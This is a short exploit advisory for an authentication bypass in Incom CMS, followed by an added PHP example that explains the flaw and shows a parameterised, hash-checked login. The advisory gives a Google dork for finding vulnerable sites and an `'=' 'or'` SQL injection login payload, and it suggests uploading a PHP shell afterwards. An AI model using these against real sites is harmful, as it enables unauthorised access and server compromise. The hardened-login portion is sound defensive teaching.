Incom CMS suffers from an authentication bypass vulnerability via remote SQL injection.
# Exploit Title: Incom Cms Admin Bypass Vulnerability
# Google Dork: intext:"incom cms" . intext:"site by overron" . intitle:"INCOM CMS"
# Date: 2014-12-29
# Exploit Author: Xodiak
# Vendor Homepage: http://facebook.com/xodiakbalckhat
# Software Link: http://incomcms.com
# Version: All versions
# Tested on: Kali, Windows
# CVE : N/A
Incom CMS admin bypass vulnerability:
http://localhost/incomcms/_cm_admin/
Sometimes you get a 403 Forbidden error, but many sites have this vulnerability.
On the admin page, enter the following username and password:
UserName : '=' 'or'
Password : '=' 'or'
You can then upload your PHP shell in the Link menu without any authentication.
Special thanks: Net-Hacker, Milad Hacking, MR.B3NY, Seravo Black Hat, Mahdi.Hidden,
MR.JOKER, MahdiYar, Mr.Cracker, Behrooz_Ice, Virangar, Ang3l--Demon, and all
Ashiyane Digital Security Team, 2Ostad members
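
Why the `'=' 'or'` value passes a concatenated login query, and a login check that rejects it, as an added example (not code from Incom CMS or from the advisory's author). The `admins` table, both function names, the query shape and the MySQL backend are assumptions, since the page shows none of the CMS's source; an in-memory SQLite table stands in for the user store so the hardened path runs offline.

```php
<?php
// Added example: hypothetical login code, not taken from Incom CMS.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admins (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO admins (username, pw_hash) VALUES (?, ?)');
// Constructed sample account.
$ins->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

// Hash checked for unknown users so the response time does not reveal
// whether a username exists.
define('DUMMY_HASH', password_hash('unused', PASSWORD_DEFAULT));

// Vulnerable pattern (assumed shape): input is concatenated into the SQL text.
function build_login_query_concat(string $user, string $pass): string
{
    return "SELECT * FROM admins WHERE username = '$user' AND password = '$pass'";
}

// Hardened pattern: the username is a bound parameter and the password never
// enters the SQL text; it is verified against the stored hash.
function login_hardened(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT pw_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();
    if ($hash === false) {
        password_verify($pass, DUMMY_HASH);
        return false;
    }
    return password_verify($pass, $hash);
}

$payload = "'=' 'or'"; // the value the advisory gives for both fields

// The quotes in the payload close the string literals, so the WHERE clause reads
//   username = '' = ' ' or '' AND password = '' = ' ' or ''
// On MySQL (assumed backend), (username = '') is 0 for any non-empty username,
// and 0 = ' ' is true after implicit string-to-number conversion, so the
// condition holds for those rows regardless of the password.
echo build_login_query_concat($payload, $payload), PHP_EOL;

// With a bound parameter the payload is only a literal username that matches
// no row, so the login is refused; the real credentials are still accepted.
var_dump(login_hardened($db, $payload, $payload));
var_dump(login_hardened($db, 'admin', 'constructed-sample-password'));
```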